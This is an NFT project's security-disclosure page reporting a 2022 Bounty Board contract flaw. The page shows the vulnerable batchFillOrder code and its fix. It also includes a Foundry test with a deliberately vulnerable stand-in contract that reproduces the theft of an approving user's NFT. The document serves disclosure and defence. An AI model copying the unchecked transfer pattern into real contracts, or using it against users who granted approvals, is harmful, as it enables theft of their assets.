🛡️Audits and Security

SZNS largely relies on battle-tested smart contracts that have been audited by PeckShield.

Security Process

We take the security of digital assets seriously at SZNS. If you find a flaw in our smart contract architecture or a serious bug in our application, please contact us at security@szns.io.

For bugs that put assets at risk, we will consider bug bounties of up to 10% of the value at risk. Thanks for being part of the ecosystem.

Updates

Any security related reports will be included here.

Bounty Board

On August 4th, 2022, Patrick Drotleff, an IT consultant, reported a vulnerability in the Bounty Board contract (0x879d25dB71DD9ff94452C510C13347fb49175D9D). The function batchFillOrder() did not check that the caller owned the NFTs being used to fill an order (NFTs given in exchange for collection tokens): it transferred each NFT from erc721.ownerOf(id) rather than from msg.sender. Because the Bounty Board contract itself held the transfer approval, an attacker could tribute NFTs belonging to any user who had approved the contract for an NFT collection, and the collection tokens for the fill would be minted to the attacker. The fix was to replace erc721.ownerOf(id) with msg.sender as the `from` argument of safeTransferFrom, so the transfer reverts unless the caller actually owns the token.

function batchFillOrder(
    Order calldata order,
    ERC721Grouping[] calldata erc721Groupings
) internal {
        ...
            if (!order.validator.meetsCriteria(address(erc721), id)) {
                revert InvalidNftError(address(erc721), id);
            }
            // Forward NFT to beneficiary
            // NOTE: reentrancy should be safe here, since we're decrementing
            //   the number of fills based on its later value.
            // VULNERABLE: `from` is the token's current owner, not the caller,
            //   so anyone can tribute a token whose owner approved this contract.
            //   The fix replaces erc721.ownerOf(id) with msg.sender.
            erc721.safeTransferFrom(
                erc721.ownerOf(id),
                order.nftBeneficiary,
                id
            );
        }
    }
    // Should throw if underflow
    remainingFills[orderHash] -= tributeCounter;
    // Payout to order filler
    order.erc20.mint(msg.sender, order.tokensPerTribute * tributeCounter);
}
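The following Foundry test is added here as an illustration and is not part of the SZNS codebase. It reproduces the bug against a minimal stand-in for the tribute logic and shows why switching `from` to msg.sender closes it: the contract is the approved operator in both versions, so the ERC721 approval check always passes, and it is the `from == ownerOf(id)` check that rejects the attacker. The contract names (Tribute, TestNFT, CollectionToken, BountyBoardExploitTest), the test addresses, and the constructor flag that selects between the two `from` arguments are assumptions; the test assumes forge-std and OpenZeppelin are installed in the project.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not the SZNS Bounty Board code. Assumes a Foundry project
// with forge-std and OpenZeppelin contracts installed; every contract and
// account name below is hypothetical.
import "forge-std/Test.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/token/ERC721/ERC721.sol";

// Collection token minted to whoever fills an order (stand-in for order.erc20).
contract CollectionToken is ERC20 {
    address public minter;
    constructor() ERC20("Collection", "COL") {}
    function setMinter(address m) external { require(minter == address(0), "minter set"); minter = m; }
    function mint(address to, uint256 amount) external { require(msg.sender == minter, "not minter"); _mint(to, amount); }
}

// Plain ERC721 so the test can mint a token to the victim.
contract TestNFT is ERC721 {
    constructor() ERC721("Test", "TST") {}
    function mint(address to, uint256 id) external { _mint(to, id); }
}

// Minimal tribute contract mirroring the shape of batchFillOrder. The
// `fromIsCaller` flag selects between the vulnerable `from` (erc721.ownerOf(id))
// and the fixed one (msg.sender) so both behaviours can be tested side by side.
contract Tribute {
    CollectionToken public immutable token;
    address public immutable nftBeneficiary;
    bool public immutable fromIsCaller;
    uint256 public constant TOKENS_PER_TRIBUTE = 1e18;

    constructor(CollectionToken token_, address beneficiary_, bool fromIsCaller_) {
        token = token_;
        nftBeneficiary = beneficiary_;
        fromIsCaller = fromIsCaller_;
    }

    function batchFill(IERC721 nft, uint256[] calldata ids) external {
        for (uint256 i = 0; i < ids.length; i++) {
            // This contract is the approved operator either way, so the ERC721
            // approval check passes; only the `from == ownerOf(id)` check differs.
            address from = fromIsCaller ? msg.sender : nft.ownerOf(ids[i]);
            nft.safeTransferFrom(from, nftBeneficiary, ids[i]);
        }
        // The payout goes to the caller, which is what made the bug profitable.
        token.mint(msg.sender, TOKENS_PER_TRIBUTE * ids.length);
    }
}

contract BountyBoardExploitTest is Test {
    address constant VICTIM = address(0xA11CE);
    address constant ATTACKER = address(0xBAD);
    address constant BENEFICIARY = address(0xBEEF);

    function deploy(bool fromIsCaller) internal returns (Tribute t, TestNFT nft, CollectionToken tok) {
        tok = new CollectionToken();
        nft = new TestNFT();
        t = new Tribute(tok, BENEFICIARY, fromIsCaller);
        tok.setMinter(address(t));
        nft.mint(VICTIM, 1);
        // The victim approves the tribute contract, intending to fill an order later.
        vm.prank(VICTIM);
        nft.setApprovalForAll(address(t), true);
    }

    function testVulnerableFromLetsAttackerTributeVictimNft() public {
        (Tribute t, TestNFT nft, CollectionToken tok) = deploy(false);
        uint256[] memory ids = new uint256[](1);
        ids[0] = 1;
        vm.prank(ATTACKER);
        t.batchFill(nft, ids);
        // The victim's NFT is gone and the attacker collected the collection tokens.
        assertEq(nft.ownerOf(1), BENEFICIARY);
        assertEq(tok.balanceOf(ATTACKER), 1e18);
    }

    function testFixedFromRevertsForNonOwner() public {
        (Tribute t, TestNFT nft, CollectionToken tok) = deploy(true);
        uint256[] memory ids = new uint256[](1);
        ids[0] = 1;
        vm.prank(ATTACKER);
        vm.expectRevert(); // ERC721 rejects from != ownerOf(id)
        t.batchFill(nft, ids);
        assertEq(nft.ownerOf(1), VICTIM);
        assertEq(tok.balanceOf(ATTACKER), 0);

        // The legitimate owner can still fill the order.
        vm.prank(VICTIM);
        t.batchFill(nft, ids);
        assertEq(nft.ownerOf(1), BENEFICIARY);
        assertEq(tok.balanceOf(VICTIM), 1e18);
    }
}
```

Run it with `forge test --match-contract BountyBoardExploitTest`. The second test also covers the practitioner's follow-up question: with msg.sender as `from`, the caller must be the owner, so a pre-existing operator approval alone is no longer enough for a third party to move a token.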

To revoke approvals granted to this contract, go to https://revoke.cash/, connect your wallet, and revoke any allowances for the contract 0x879d25dB71DD9ff94452C510C13347fb49175D9D.

After Patrick contacted us, we reached out to the at-risk individuals who had ENS names. No one was exploited via this vulnerability. Patrick was awarded 1 ETH as a reward.
